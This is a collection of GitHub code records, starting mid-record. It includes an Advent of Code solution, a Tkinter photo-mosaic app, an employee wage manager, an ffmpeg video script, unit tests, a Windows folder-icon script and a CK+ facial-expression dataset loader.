data=[ERROR_list.index(w[i])+1,str(which_combi[ERROR_list.index(w[i])])[1:-1],w[i] ,w[i]**.5 ]\n writer = csv.writer(File2)\n writer.writerow(data)\nFile2.close\n\nwith open('MAE_min.csv','w') as File3:\n data=[\"Combination no\",\"Combination\",\"Mean Absolute Error\"]\n writer = csv.writer(File3)\n writer.writerow(data)\n\n for i in range(len(w)):\n if \"Cites/Doc(2years)\" not in str(which_combi[MAE.index(w2[i])])[1:-1]: \n data=[MAE.index(w2[i])+1,str(which_combi[MAE.index(w2[i])])[1:-1],w2[i] ]\n writer = csv.writer(File3)\n writer.writerow(data)\n\nFile3.close","repo_name":"dak-7309/P-S-Projects","sub_path":"Multivariate Regression- use other factors like sjr, total docs/assignment2_2018137.py","file_name":"assignment2_2018137.py","file_ext":"py","file_size_in_byte":7604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5724926633","text":"#! /usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\n\r\ndef is_valid(numbers, number):\r\n visited = set()\r\n for n in numbers:\r\n if number - n in visited:\r\n return True\r\n visited.add(n)\r\n return False\r\n\r\ndef main():\r\n with open('./input.txt', 'r') as f:\r\n numbers = [int(x) for x in f.readlines()]\r\n \r\n i = 25\r\n while is_valid(numbers[i-25 : i], numbers[i]):\r\n i += 1\r\n invalid = numbers[i]\r\n print(\"Part 1: {}\".format(invalid))\r\n\r\n tail, head, rolling_sum = 0, 0, numbers[0]\r\n while rolling_sum != invalid:\r\n if rolling_sum < invalid:\r\n head += 1\r\n rolling_sum += numbers[head]\r\n else:\r\n rolling_sum -= numbers[tail]\r\n tail += 1\r\n \r\n ans = min(numbers[tail:head]) + max(numbers[tail:head])\r\n print(\"Part 2: {}\".format(ans))\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"ErikGralen/AdventOfCode","sub_path":"2020/Day09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"873274807","text":"import tkFileDialog\nfrom Tkinter import *\nfrom PIL import ImageTk, Image\nimport random\nimport os\nimport tkMessageBox\nfrom FotoMosaico import *\nfrom FiltroMosaico import *\n\nclass Filtros(Frame):\n\n #Constructor de la clase\n def __init__(self, parent):\n\n Frame.__init__(self,parent)\n self.pack(fill=BOTH, expand=True)\n self.creaMenu()\n self.creaCanvas()\n\n #Funcion para cargar el menun en la ventana\n def creaMenu(self):\n\n self.menuBar = Menu(self)\n self.archivoMenu = Menu(self.menuBar, tearoff=0)\n self.archivoMenu.add_command(label=\"Abrir\", command=self.escogerImagen)\n self.menuBar.add_cascade(label=\"Imagen\", menu=self.archivoMenu)\n self.filtroMenu = Menu(self.menuBar, tearoff=0)\n self.filtroMenu.add_command(label=\"Genera archivo de imagenes\", command= self.generaArchivo)\n self.filtroMenu.add_command(label=\"Genera imagen\", command= self.aplicaFotoMosaico)\n self.menuBar.add_cascade(label=\"Foto Mosaico\", menu=self.filtroMenu)\n root.config(menu=self.menuBar)\n\n\n def creaCanvas(self):\n self.originalVentana = Canvas(self, bg=\"pink\",width=500,height=400)\n self.originalVentana.pack(side=LEFT, fill=BOTH, expand=True)\n\n self.filtroVentana = Canvas(self,bg =\"orange\",width=500,height=400 )\n self.filtroVentana.pack(side=RIGHT, fill=BOTH, expand=True)\n\n #Funcion para colocar las imagenes en las areas para imagenes\n def escogerImagen(self):\n size = 500,500\n self.ruta = tkFileDialog.askopenfilename()\n self.imagen = Image.open(self.ruta)\n self.aplica = Image.open(self.ruta)\n self.imagen.thumbnail(size,Image.ANTIALIAS)\n self.aplica.thumbnail(size,Image.ANTIALIAS)\n self.rgb = self.imagen.convert('RGB')\n self.pixels = self.aplica.load()\n imageFile = ImageTk.PhotoImage(self.imagen)\n imageAplica = ImageTk.PhotoImage(self.aplica)\n self.originalVentana.image = imageFile\n self.originalVentana.create_image(imageFile.width()/2, imageFile.height()/2, anchor=CENTER, image=imageFile, tags=\"bg_img\")\n self.filtroVentana.image = imageAplica\n self.filtroVentana.create_image(imageAplica.width()/2, imageAplica.height()/2, anchor=CENTER, image=imageAplica, tags=\"bg_img\")\n self.originalVentana.create_text((250,380),text=\"Imagen original\")\n self.filtroVentana.create_text((250,380),text=\"Imagen con filtro\")\n\n \"\"\"\n Funcion que indica que va a tardar el foto mosaico y pide la carpeta de imagenes que se usara\n \"\"\"\n def aplicaFotoMosaico(self):\n if self.filtroVentana.find_all() != ():\n self.top = Toplevel()\n\n self.label = Label (self.top, text= \"Introduce el tamanio del mosaico\\nDa dos valores positivos para (x,y) \")\n self.label.pack()\n\n self.entraX = IntVar()\n Entry(self.top, textvariable=self.entraX).pack()\n\n self.entraY = IntVar()\n Entry(self.top, textvariable=self.entraY).pack()\n\n self.label3 = Label(self.top, text=\"Introduce el nombre del archivo que contiene la informacion de las imagenes a usar\")\n self.label3.pack()\n\n self.archivo = StringVar()\n Entry(self.top, textvariable=self.archivo).pack()\n\n self.label4 = Label (self.top, text=\"Selecciona la carpeta con las imagenes a usar\")\n self.label4.pack()\n\n self.buttontext = StringVar()\n self.buttontext.set(\"Obten fotomosaico\")\n self.button = Button(self.top, textvariable=self.buttontext, command= lambda: self.sacaFotoMosaico(self.entraX,self.entraY,self.archivo)).pack()\n\n self.label2 = Label (self.top, text = \"Va a tardar en generar el foto mosaico\")\n self.label2.pack()\n else:\n tkMessageBox.showwarning(\"Error\",\"Escoge una imagen antes de aplicar un filtro\")\n\n def sacaFotoMosaico(self,valorX,valorY,nombre):\n self.entraX = valorX.get()\n self.entraY = valorY.get()\n self.archivo = nombre.get()\n carpeta = tkFileDialog.askdirectory()\n self.nuevaImagen = filtroFotoMosaico(self.imagen,self.aplica,carpeta,self.entraX,self.entraY,self.archivo)\n imageAplica = ImageTk.PhotoImage(self.nuevaImagen)\n self.filtroVentana.image = imageAplica\n self.filtroVentana.create_image(imageAplica.width()/2, imageAplica.height()/2, anchor=CENTER, image=imageAplica, tags=\"bg_img\")\n self.top.destroy()\n\n\n def generaArchivo(self):\n if self.filtroVentana.find_all() != ():\n self.top = Toplevel()\n self.label2 = Label(self.top, text=\"Da un nombre al archivo .txt que se va a generar\")\n self.label2.pack()\n self.nombre = StringVar()\n Entry(self.top, textvariable=self.nombre).pack()\n self.label = Label (self.top, text= \"Selecciona la carpeta con las imagenes que se usaran para el fotomosaico\")\n self.label.pack()\n self.buttontext = StringVar()\n self.buttontext.set(\"Selecciona carpeta\")\n self.button = Button(self.top, textvariable=self.buttontext, command= lambda: self.generaArchivoImg(self.nombre)).pack()\n self.label3 = Label(self.top, text=\"Se va a tardar en generar el archivo\")\n self.label3.pack()\n else:\n tkMessageBox.showwarning(\"Error\",\"Escoge una imagen antes de aplicar un filtro\")\n\n\n def generaArchivoImg(self,archivo):\n self.nombre = archivo.get()\n carpeta = tkFileDialog.askdirectory()\n guardaImagenes(carpeta,self.nombre)\n self.top.destroy()\n\n#Se ejecuta el programa\nroot = Tk()\nroot.title(\"Filter Kar\")\nroot.wm_state(\"normal\")\n\napp = Filtros(root)\n\nroot.mainloop()\n","repo_name":"kaarla/digital-process-images","sub_path":"Proyecto/Proyecto.py","file_name":"Proyecto.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28443743897","text":"import random\nimport logging\nimport json\n\n\nlogging.basicConfig(filename='EmployeeWage_logs.log',\n encoding='utf-8', level=logging.DEBUG)\n\n\nclass Employee:\n\n def __init__(self, employee_parameters_dict):\n self.total_wage = 0\n self.total_emp_hrs = 0\n self.total_emp_days = 0\n self.emp_name = employee_parameters_dict.get(\"employee_name\")\n self.emp_wage = employee_parameters_dict.get(\"employee_wage\")\n self.max_working_hrs = employee_parameters_dict.get(\n \"maximum_working_hrs\")\n self.max_working_days = employee_parameters_dict.get(\n \"maximum_working_days\")\n\n def calc_wage(self):\n \"\"\"\n Function calculates wage of month\n :return: Employee Wage for the month\n \"\"\"\n try:\n is_full_time = 1\n is_part_time = 2\n\n while self.total_emp_hrs < self.max_working_hrs and self.total_emp_days < self.max_working_days:\n\n emp_check = random.randrange(0, 3)\n if emp_check == is_full_time:\n emp_hrs = 8\n self.total_emp_days += 1\n elif emp_check == is_part_time:\n emp_hrs = 4\n self.total_emp_days += 1\n else:\n emp_hrs = 0\n\n self.total_emp_hrs += emp_hrs\n self.total_wage += emp_hrs * self.emp_wage\n\n except Exception as e:\n print(e)\n logging.exception(e)\n\n\nclass Company:\n\n def __init__(self, company_name):\n self.company_name = company_name\n self.employee_dict = {}\n\n def add_emp(self, employee_object):\n \"\"\"\n Function to add employee object to employee_dict dictionary\n :param employee_object:\n :return:\n \"\"\"\n try:\n self.employee_dict.update(\n {employee_object.emp_name: employee_object})\n except Exception as e:\n print(e)\n logging.exception(e)\n\n def get_emp(self, emp_name):\n \"\"\"\n Function to get employee object\n :param emp_name: string\n :return: Employee object\n \"\"\"\n return self.employee_dict.get(emp_name)\n\n def update_emp(self, employee_object, data_dict):\n \"\"\"\n Function to update employee information in employee_dict dictionary\n :return:\n \"\"\"\n try:\n employee_object.emp_wage = data_dict.get(\"update_wage\")\n employee_object.max_working_hrs = data_dict.get(\n \"update_working_hours\")\n employee_object.max_working_days = data_dict.get(\n \"update_working_days\")\n\n except Exception as e:\n print(e)\n logging.exception(e)\n\n def delete_emp(self, emp_name):\n \"\"\"\n Function deletes existing employee from the employee_dict dictionary\n :return:\n \"\"\"\n try:\n self.employee_dict.pop(emp_name, \"Employee not found\")\n except Exception as e:\n print(e)\n logging.exception(e)\n\n def display_employees(self):\n \"\"\"\n Function to display all employees\n :return: Employee information\n \"\"\"\n print(\n \" Employee Name \\tEmployee Wage \\tTotal Working hours \\tTotal working days\")\n for key, value in self.employee_dict.items():\n print(\"\\t{}\\t\\t{}\\t\\t{}\\t\\t{}\".format(value.emp_name, value.emp_wage,\n value.max_working_hrs, value.max_working_days))\n\n def display_employee_data(self, emp_name):\n \"\"\"\n Function displays monthly wage, hours and days\n :return:\n \"\"\"\n try:\n employee_object = self.get_emp(emp_name)\n if not employee_object:\n print(\"Employee not present\")\n else:\n print(\"s.no\\t\\tDetails\\t\\t\\t\\t\\t Data\")\n print(\"1.\\tTotal employee wage for the month \\t\\t {}\".format(\n employee_object.total_wage))\n print(\"2.\\tTotal days employee worked for the month \\t {}\".format(\n employee_object.total_emp_days))\n print(\"3.\\tTotal hours employee worked for the month \\t {}\".format(\n employee_object.total_emp_hrs))\n except Exception as e:\n print(e)\n logging.exception(e)\n\n\nclass MultipleCompanies:\n def __init__(self,):\n self.company_dict = {}\n self.write_to_json_file = write_to_json_file\n\n def add_company(self, company_object):\n \"\"\"\n Function add company to company_dict dictionary\n :param company_object:\n \"\"\"\n try:\n self.company_dict.update(\n {company_object.company_name: company_object})\n except Exception as e:\n print(e)\n logging.exception(e)\n\n def get_company_object(self, company_name):\n return self.company_dict.get(company_name)\n\n def display_company(self):\n \"\"\"\n Function to display company_dict dictionary\n \"\"\"\n # print(self.company_dict.keys())\n # display values\n for company_name, company_object in self.company_dict.items():\n print(company_name)\n\n def remove_company(self, company_name):\n \"\"\"\n Function to remove a company from company_dict dictionary\n :param company_name:\n \"\"\"\n self.company_dict.pop(company_name, \"Company not present\")\n\n def write_to_csv_file(self):\n \"\"\"\n Function to write details of employee\n \"\"\"\n try:\n with open(\"company_info.csv\", \"w\") as write_file:\n fieldnames = ['employee_name', 'employee_wage',\n 'maximum_working_hrs', 'max_working_days']\n\n csv_writer = csv.DictWriter(write_file, fieldnames=fieldnames)\n csv_writer.writeheader()\n\n for company_name, company_object in self.company_dict.items():\n company_dictionary = company_object.get_company_object()\n for key, value in company_dict.items():\n csv_writer.writerow(value)\n except Exception as e:\n print(e)\n logging.exception(e)\n\n\nclass JsonMixin:\n def write_to_json_file(self):\n \"\"\"\n Function to write Details to Json File\n \"\"\"\n json_dict = {}\n for company_name, company_object in self.company_dict.items():\n company_dictionary = company_object.get_company_object()\n\n json_dict.update({company_name: company_dictionary})\n with open(\"company_info.json\", \"w\")as write_file:\n json.dump(json_dict, write_file, indent=4)\n\n\ndef write_to_json_file():\n \"\"\"\n Function to write contact information to a json file\n \"\"\"\n multiple_companies.write_to_json_file()\n\n\ndef read_from_json_file():\n \"\"\"\n Function to read a contact from json file\n \"\"\"\n with open(\"company_info.json\", \"r\")as read_file:\n json_object = json.load(read_file)\n print(json_object)\n\n\ndef write_to_csv_file():\n \"\"\"\n Function to write contact information to a json file\n \"\"\"\n multiple_companies.write_to_json_file()\n\n\ndef read_from_csv_file():\n \"\"\"\n Function to read contacts from a CSV file\n \"\"\"\n with open(\"company_info.csv\", \"r\") as read_file:\n csv_reader = csv.DictReader(read_file)\n\n for line in csv_reader:\n print(line)\n\n\ndef add_employee():\n \"\"\"\n Function to add employee\n \"\"\"\n try:\n # Taking input from user\n company_name = input(\"Enter company name : \")\n company_object = multiple_companies.get_company_object(company_name)\n if not company_object:\n company_object = Company(company_name)\n multiple_companies.add_company(company_object)\n\n employee_name = input(\"Enter employee name : \")\n if employee_name == \"\":\n print(\"Please enter employee name\")\n return\n employee_wage = int(input(\"Enter employee wage per hour : \"))\n maximum_working_hrs = int(input(\"Enter employee work hours : \"))\n maximum_working_days = int(input(\"Enter employee working days : \"))\n\n # using dictionary instead of passing multiple parameters\n emp_parameters = {\"employee_name\": employee_name, \"employee_wage\": employee_wage,\n \"maximum_working_hrs\": maximum_working_hrs, \"maximum_working_days\": maximum_working_days}\n employee = Employee(emp_parameters)\n\n # calculating employee wage\n employee.calc_wage()\n\n # adding employee object in dictionary\n company_object.add_emp(employee)\n write_to_json_file()\n write_to_csv_file()\n\n except Exception as e:\n print(e)\n logging.exception(e)\n\n\ndef update_employee():\n \"\"\"\n Function to update employee\n \"\"\"\n try:\n comp_name_to_update = input(\n \"Enter company to update employee information : \")\n company_obj = multiple_companies.get_company_object(\n comp_name_to_update)\n employee_name = input(\"Enter employee name to update : \")\n emp_object = company_obj.get_emp(employee_name)\n if not emp_object:\n print(\"Employee not present\")\n else:\n update_wage = int(input(\"Enter new wage to update : \"))\n\n update_working_hours = int(\n input(\"Enter new working hours to update : \"))\n\n update_working_days = int(\n input(\"Enter new working days to update : \"))\n\n company_obj.update_emp(emp_object, {\"update_wage\": update_wage,\n \"update_working_hours\": update_working_hours,\n \"update_working_days\": update_working_days})\n\n write_to_json_file()\n write_to_csv_file()\n\n except Exception as e:\n print(e)\n logging.exception(e)\n\n\ndef display_employee():\n \"\"\"\n Function to display specific employee information\n \"\"\"\n # Display all employees\n company_name = input(\"Enter company to view employees : \")\n company_object = multiple_companies.get_company_object(company_name)\n company_object.display_employees()\n\n\ndef display_employee_wage():\n \"\"\"\n Function to display employee wage information\n \"\"\"\n # display monthly wage information\n company_name = input(\"Enter company to view employee wage information : \")\n company_object = multiple_companies.get_company_object(company_name)\n employee_name = input(\n \"Enter name of the employee you want the wage information of : \")\n company_object.display_employee_data(employee_name)\n\n\ndef delete_employee():\n \"\"\"\n Function to delete specific employee from a specific company\n \"\"\"\n # delete\n company_name = input(\"Enter company to delete employees : \")\n company_object = multiple_companies.get_company_object(company_name)\n employee_name = input(\"Enter employee name : \")\n company_object.delete_emp(employee_name)\n write_to_json_file()\n write_to_csv_file()\n\n\ndef display_companies():\n \"\"\"\n Function to display all companies\n \"\"\"\n # Display company_dict dictionary\n multiple_companies.display_company()\n\n\ndef delete_company():\n \"\"\"\n Function to remove a company from dictionary\n \"\"\"\n # Delete a company\n company_name = input(\"Enter company name to delete : \")\n multiple_companies.remove_company(company_name)\n\n write_to_json_file()\n write_to_csv_file()\n\n\nif __name__ == \"__main__\":\n try:\n multiple_companies = MultipleCompanies()\n\n while True:\n choice = int(input(\"1. Add new employee\\t2. Show all employees\\t3. Show employee wage data\\t\"\n \"4. Update employee\\t5. Delete employee\\t6. Display all companies\\t\"\n \"7. Delete a company\\t8. Read from a JSON file\\t9. Write to JSON file\\t10. read from csv file\\t11. Write to csv file\\t0. Exit\\nEnter your choice : \"))\n\n choice_dict = {1: add_employee, 2: display_employee, 3: display_employee_wage, 4: update_employee,\n 5: delete_employee, 6: display_companies, 7: delete_company, 8: read_from_json_file, 9: write_to_json_file, 10: read_from_csv_file, 11: write_to_csv_file}\n\n if choice == 0:\n break\n elif choice > 11:\n print(\"Enter correct choice\")\n else:\n choice_dict.get(choice)()\n\n except Exception as e:\n print(e)\n logging.exception(e)\n","repo_name":"ItsrAvI-rAnJaN/employeewagecomputation","sub_path":"employeewage.py","file_name":"employeewage.py","file_ext":"py","file_size_in_byte":12632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40247089945","text":"import threading\nimport sys\nimport os\nimport subprocess\nimport customtkinter as tk\n# root = tk.Tk()\n\ndef convert():\n # s = f\"ffmpeg -sseof -00:00:30 -display_hflip -nostdin -i original.mp4 -crf 30 -s 720x360 {output_sv.get()}{file_e} 2>C:\\myffmpeg\\log.txt\"\n print(\"calling convert...\")\n try:\n results = subprocess.call([\n 'ffmpeg',\n '-framerate', '2',\n '-pattern_type', 'sequence',\n '-i', 'C:\\dat4sem\\Python\\weekTwo\\Plot_Pandas_API_DST\\img\\img%1d.png',\n '-s:v', '1920x1080',\n '-c:v', 'libx264',\n '-pix_fmt', 'yuv420p',\n 'C:\\dat4sem\\Python\\weekTwo\\Plot_Pandas_API_DST\\img\\out1.mp4'])\n # 'ffmpeg',\n # '-ss', '00:19:15', # denne slags tider må gerne sættes direkte i sekunder, fx 1,5 min = 90 (ingen : eller noget)\n # # '-display_hflip',\n # '-nostdin',\n # '-i', input_sv.get(),\n # '-crf', '15', # 9 er minimum?\n # '-s', '1080x720', # yt standard?\n # '-an', # no audio...\n # '-t', '00:00:45', # time after -ss to include...\n # '-vf','setpts=16*PTS', # slow mo... 8 = amount\n # 'test.mp4'])\n # f\"{output_sv.get()}{file_e}\"])\n\n if results:\n print(\"Failure\")\n # done.set(\"Working on it...\")\n else:\n print(\"Success!\")\n # done.set(\"Done!\")\n\n \n except:\n print(\"Failure\")\n\ndef start_submit_thread():\n print(\"starting submit thread...\")\n global submit_thread\n submit_thread = threading.Thread(target=convert)\n submit_thread.daemon = True\n # progressbar.start()\n submit_thread.start()\n tk.after(20, check_submit_thread)\n\ndef check_submit_thread():\n print(\"checking submit thread...\")\n if submit_thread.is_alive():\n tk.after(20, check_submit_thread)\n else:\n print(\"done\")\n # progressbar.stop()\n\n# start_submit_thread()","repo_name":"dgh81/Plot_Pandas_API_DST","sub_path":"animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41746746120","text":"from nose.tools import assert_equal\n\nfrom stream_alert.rule_processor.config import load_config\nfrom stream_alert.rule_processor.parsers import get_parser\n\n\nclass TestKVParser(object):\n \"\"\"Test class for KVParser\"\"\"\n @classmethod\n def setup_class(cls):\n \"\"\"Setup the class before any methods\"\"\"\n # load config\n cls.config = load_config('test/unit/conf')\n # load JSON parser class\n cls.parser_class = get_parser('kv')\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Teardown the class after all methods\"\"\"\n cls.config = None\n cls.parser_class = None\n\n def parser_helper(self, **kwargs):\n \"\"\"Helper to return the parser result\"\"\"\n data = kwargs['data']\n schema = kwargs['schema']\n options = kwargs['options']\n\n kv_parser = self.parser_class(options)\n parsed_result = kv_parser.parse(schema, data)\n return parsed_result\n\n def test_kv_parsing(self):\n \"\"\"Parse KV - 'key:value,key:value'\"\"\"\n # setup\n schema = {\n 'name': 'string',\n 'result': 'string'\n }\n options = {\n 'separator': ':',\n 'delimiter': ',',\n }\n data = 'name:joe bob,result:success'\n\n # get parsed data\n parsed_data = self.parser_helper(data=data, schema=schema, options=options)\n\n assert_equal(len(parsed_data), 1)\n assert_equal(parsed_data[0]['name'], 'joe bob')\n","repo_name":"ip-2014/streamalert","sub_path":"test/unit/stream_alert_rule_processor/test_kv_parser.py","file_name":"test_kv_parser.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"70758829609","text":"from mock import Mock, create_autospec\r\nfrom typing import List\r\nimport numpy as np\r\n\r\nfrom facekeeper.core import (\r\n FaceKeeper,\r\n RecognizerInterface,\r\n MatcherInterface,\r\n DownloaderInterface,\r\n StorageInterface,\r\n PersonEmbedding,\r\n get_digest,\r\n)\r\n\r\n\r\ndef test_initialization():\r\n # Given\r\n recognizer_id = \"Any Recognizer ID\"\r\n embeddings: List[PersonEmbedding] = [\r\n PersonEmbedding(\"id-1\", \"Agent Smith\", np.array([1, 2, 3]), [])\r\n ]\r\n\r\n downloader = create_autospec(DownloaderInterface)\r\n matcher = create_autospec(MatcherInterface)\r\n\r\n recognizer = create_autospec(RecognizerInterface)\r\n recognizer.get_id = Mock(return_value=recognizer_id)\r\n\r\n storage = create_autospec(StorageInterface)\r\n storage.get_embeddings = Mock(return_value=embeddings)\r\n facekeeper = FaceKeeper(downloader, recognizer, storage, matcher)\r\n\r\n # When\r\n facekeeper.initialize()\r\n\r\n # Then\r\n recognizer.get_id.assert_called_once()\r\n storage.get_embeddings.assert_called_once_with(recognizer_id)\r\n matcher.add_embeddings.assert_called_once_with(embeddings)\r\n assert facekeeper.is_initialized()\r\n\r\n\r\ndef test_memorize_using_photo_with_person():\r\n \"\"\"\r\n Ensure that when we call memorize method the FaceKeeper will:\r\n 1. calculate embeddings for given image\r\n 2. store the embeddings in the Storage and\r\n 3. add them into to the currently running Recognizer\r\n \"\"\"\r\n # Given\r\n recognizer_id: str = \"Any Recognizer ID\"\r\n person: str = \"John Smith\"\r\n image: bytes = bytes([0x13, 0x00, 0x00, 0x00, 0x08, 0x00])\r\n tags = [\"user\"]\r\n digest = get_digest(image)\r\n embedding: np.array = np.array([1, 2, 3])\r\n\r\n recognizer = create_autospec(RecognizerInterface)\r\n recognizer.get_id = Mock(return_value=recognizer_id)\r\n recognizer.calc_embedding = Mock(return_value=embedding)\r\n\r\n downloader = create_autospec(DownloaderInterface)\r\n downloader.download = Mock(return_value=image)\r\n storage = create_autospec(StorageInterface)\r\n matcher = create_autospec(MatcherInterface)\r\n facekeeper = FaceKeeper(downloader, recognizer, storage, matcher)\r\n\r\n # When\r\n facekeeper.memorize(person, \"any-url\", tags)\r\n\r\n # Then\r\n recognizer.get_id.assert_called_once()\r\n recognizer.calc_embedding.assert_called_once_with(image)\r\n matcher.add_embeddings.assert_called_once()\r\n storage.save_embedding.assert_called_once_with(\r\n person, digest, recognizer_id, embedding, tags\r\n )\r\n\r\n\r\n","repo_name":"dairlair/facekeeper","sub_path":"facekeeper/tests/test_facekeeper.py","file_name":"test_facekeeper.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37238384126","text":"import os\n\n\nfolders = next(os.walk('.'))[1]\nfor folder in folders:\n f = open(folder + \"\\\\desktop.ini\", \"w+\")\n f.write(\"[.ShellClassInfo]\\nConfirmFileOp=0\\n\")\n f.write(\"IconResource={},0\".format(folder + \".ico\"))\n f.write(\"\\nIconFile={}\\nIconIndex=0\".format(folder + \".ico\"))\n f.close()\n os.system('attrib +r \\\"{}\\\\{}\\\"'.format(os.getcwd(), folder))\n os.system('attrib +h \\\"{}\\\\desktop.ini\\\"'.format(folder))\n os.system('attrib +h \\\"{}\\\"'.format(folder + \"\\\\\" + folder + \".ico\"))\n","repo_name":"Omar-Abdul-Azeez/Anime-Tools","sub_path":"create_desktop.ini.py","file_name":"create_desktop.ini.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18251452263","text":"'''\nTitle : 유기농 배추\nLevel : S2\nProblem : 해충을 보호하기 위한 지렁이를 구입했다. 이 지렁이는 배추 근처에 서식하며 해충을 잡아먹는다.\n 어떤 배추에 지렁이가 한 마리라도 살고 있으면 인접한 다른 배추로 이동할 수 있고, 보호받을 수 있따\n 한 배추의 상하좌우 네 방향이 인접해 있는 것이다.\n 배추들이 몇 군데에 퍼져있는지 조사하여 필요한 지렁이 양을 구한다.\nType : bfs\nIdea : 1. 반복문을 통해 모든 배열을 순회한다.\n 2. 현재 값이 1이고 방문한 적이 없다면, bfs를 통해 상하좌우를 순회하며 인접한 배추를 찾는다.\n 3. visit배열을 통해 방문여부를 체크한다.\n 4. 2~3을 반복한다.\n'''\nimport sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nT = int(input())\n\ndr, dc = (-1,1,0,0), (0,0,-1,1)\nfor tc in range(T):\n C,R,K = map(int, input().split())\n board = [[0 for _ in range(C)] for __ in range(R)]\n visit = [[False for _ in range(C)] for __ in range(R)]\n answer = 0\n for k in range(K) :\n c, r = map(int, input().split())\n board[r][c] = 1\n\n bfs = deque()\n for r in range(R):\n for c in range(C):\n if board[r][c] == 1 and visit[r][c] is False:\n answer += 1\n bfs.append([r, c])\n visit[r][c] = True\n while len(bfs) != 0:\n cur_r, cur_c = bfs.pop()\n for i in range(4):\n nr, nc = cur_r + dr[i], cur_c + dc[i]\n if 0 <= nr < R and 0 <= nc < C:\n if board[nr][nc] == 1 and visit[nr][nc] is False:\n bfs.append([nr, nc])\n visit[nr][nc] = True\n\n print(answer)","repo_name":"Just-NB/Algorithm","sub_path":"Baekjoon/2021/Dec/03/1012.py","file_name":"1012.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38224344495","text":"\"\"\"\nAuthor(s):\n John Boccio\nLast revision:\n 10/18/2019\nDescription:\n API for using the \"CK+\" dataset. To use this, you must have the paths defined in the config.json. This API only uses\n the \"peak\" emotion pictures from the dataset asa those are the ones that are labeled with facial expressions.\n Labels: 0=neutral, 1=anger, 2=contempt, 3=disgust, 4=fear, 5=happy, 6=sadness, 7=surprise\n Since this data set has an extra label (contempt), those data points will be removed\n\n http://www.consortium.ri.cmu.edu/ckagree/\n\"\"\"\nfrom torch.utils.data import Dataset\nfrom skimage import io\nfrom utils import DatasetType\nfrom utils import FerExpression\nimport ConfigParser as Cp\nimport os\nimport pickle\nimport torch\n\n\nclass CKDataset(Dataset):\n __train = None\n __test = None\n __validation = None\n\n def __init__(self, set_type=DatasetType.TRAIN, tf=None):\n self.transform = tf\n self.set_type = set_type\n\n # Check if the dataset has already been initialized\n if CKDataset.__train is not None \\\n and CKDataset.__test is not None \\\n and CKDataset.__validation is not None:\n return\n\n # If dataset is not initialized, check if we have it pickled\n if os.path.exists(\"./metadata/ck/ck.pickle\"):\n dataset = pickle.load(open(\"./metadata/ck/ck.pickle\", \"rb\"))\n CKDataset.__train = dataset['train']\n CKDataset.__test = dataset['test']\n CKDataset.__validation = dataset['validation']\n return\n\n # Initialize it the hard way\n data = []\n\n ck_config = Cp.ConfigParser.get_config()[\"data_loader\"][\"CK\"]\n # Go through the image directory and find images for the associated dataset type\n img_dir = ck_config[\"image_dir\"]\n emotion_dir = ck_config[\"emotion_dir\"]\n for root, dirs, files in os.walk(img_dir):\n for file in files:\n img_path = os.path.join(root, file)\n rel_img_path = img_path.replace(img_dir, '')\n\n # Find the associated emotion\n # Get the full path for the emotion file for this image\n emotion_path = emotion_dir + rel_img_path\n # The emotion file name is the same as the image file name with _emotion.txt instead of .png\n emotion_path = emotion_path.replace(\".png\", \"_emotion.txt\")\n\n # The emotion label only exists for peak emotions in the sequences\n if os.path.isfile(emotion_path):\n with open(emotion_path) as f:\n emotion = int(f.readline().strip(' ')[0])\n emotion = CKDataset.ck_to_expression(emotion)\n if emotion is None:\n continue\n\n data_point = {\n \"img_path\": img_path,\n # Adjust the expression to match the Expression Enum\n \"expression\": emotion\n }\n data.append(data_point)\n\n # Split into train and test\n CKDataset.__train = data[:int(len(data)*.80)]\n CKDataset.__test = data[int(len(data)*.80):int(len(data)*.95)]\n CKDataset.__validation = data[int(len(data)*.95):]\n\n dataset = {'train': CKDataset.__train,\n 'test': CKDataset.__test,\n 'validation': CKDataset.__validation}\n pickle.dump(dataset, open(\"./metadata/ck/ck.pickle\", \"wb\"))\n\n def __len__(self):\n if self.set_type == DatasetType.TRAIN:\n return len(CKDataset.__train)\n elif self.set_type == DatasetType.TEST:\n return len(CKDataset.__test)\n elif self.set_type == DatasetType.VALIDATION:\n return len(CKDataset.__validation)\n return -1\n\n def __getitem__(self, item):\n if torch.is_tensor(item):\n item = item.tolist()\n\n # Deep copies so the user can't mess with the dataset\n if self.set_type == DatasetType.TRAIN:\n data = CKDataset.__train[item].copy()\n elif self.set_type == DatasetType.TEST:\n data = CKDataset.__test[item].copy()\n elif self.set_type == DatasetType.VALIDATION:\n data = CKDataset.__validation[item].copy()\n else:\n return None\n\n sample = {\n \"img\": io.imread(data[\"img_path\"]),\n \"expression\": data[\"expression\"]\n }\n\n if self.transform:\n sample = self.transform(sample[\"img\"])\n\n return sample\n\n @staticmethod\n def ck_to_expression(expression):\n if expression == 0:\n return FerExpression.NEUTRAL.value\n elif expression == 1:\n return FerExpression.ANGRY.value\n elif expression == 3:\n return FerExpression.DISGUST.value\n elif expression == 4:\n return FerExpression.FEAR.value\n elif expression == 5:\n return FerExpression.HAPPY.value\n elif expression == 6:\n return FerExpression.SAD.value\n elif expression == 7:\n return FerExpression.SURPRISE.value\n return 